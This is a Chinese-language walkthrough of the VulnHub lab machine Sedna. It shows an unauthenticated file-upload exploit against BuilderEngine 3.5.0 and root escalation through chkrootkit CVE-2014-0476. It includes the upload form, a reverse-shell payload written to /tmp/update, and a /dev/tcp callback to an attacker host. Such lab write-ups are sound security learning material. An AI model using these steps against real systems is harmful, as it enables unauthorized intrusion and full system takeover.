hackfest2016: Sedna

项目地址:https://download.vulnhub.com/hackfest2016/Sedna.ova

是一个打包好的镜像文件

注意:导入 vmx 时一定要选择我已移动,否则没网

使用 Nmap 扫描出开放服务及操作系统版本

文件上传

BuilderEngine 3.5.0

扫描后台发现有个这个目录可以访问

访问过去是空白,查看页面源代码推测使用的框架

去 Exploit-DB 中找到历史 NDay

按照官网给出的路径访问过去

创建一个简单的 HTML 文件 upload.html,内容如下

1
2
3
4
<form method="post" action="http://192.168.110.132/themes/dashboard/assets/plugins/jquery-file-upload/server/php/" enctype="multipart/form-data">
    <input type="file" name="files[]" />
    <input type="submit" value="Upload" />
</form>

上传我们的反弹 Shell

/files 路径中可以找到我们上传的 WebShell

成功连接上

提权

chkrootkit 检测工具(CVE-2014-0476)

发现 /etc 目录下有 chkrootkit 程序

chkrootkit 是一个用来检测 rootkit 的安全工具,通常以 root 权限 运行

漏洞位于 chkrootkit 的 slapper() 函数中。这是一个用来检测 Slapper 蠕虫的函数,它会检查系统是否存在特定恶意文件。问题代码大致如下

1
2
3
4
5
6
7
8
9
10
11
slapper (){
   SLAPPER_FILES="... ${ROOTDIR}tmp/update ..."   # 包含 /tmp/update 路径
   file_port=
   
   for i in ${SLAPPER_FILES}; do
      if [ -f ${i} ]; then
         file_port=$file_port $i      # ← 漏洞行!
         STATUS=1
      fi
   done
}

问题所在:第 file_port=$file_port $i 这一行,变量赋值缺少引号

  • file_port 为空时,这一行实际执行的是 $i
  • $i 是文件路径,例如 /tmp/update
  • 这意味着:chkrootkit 会直接执行 /tmp/update 这个文件

/tmp 目录下创建一个名为 update 的文件

1
2
3
echo '#!/bin/bash
bash -i >& /dev/tcp/192.168.110.128/445 0>&1' > /tmp/update
chmod +x /tmp/update

Kali 开启监听等着反弹就行了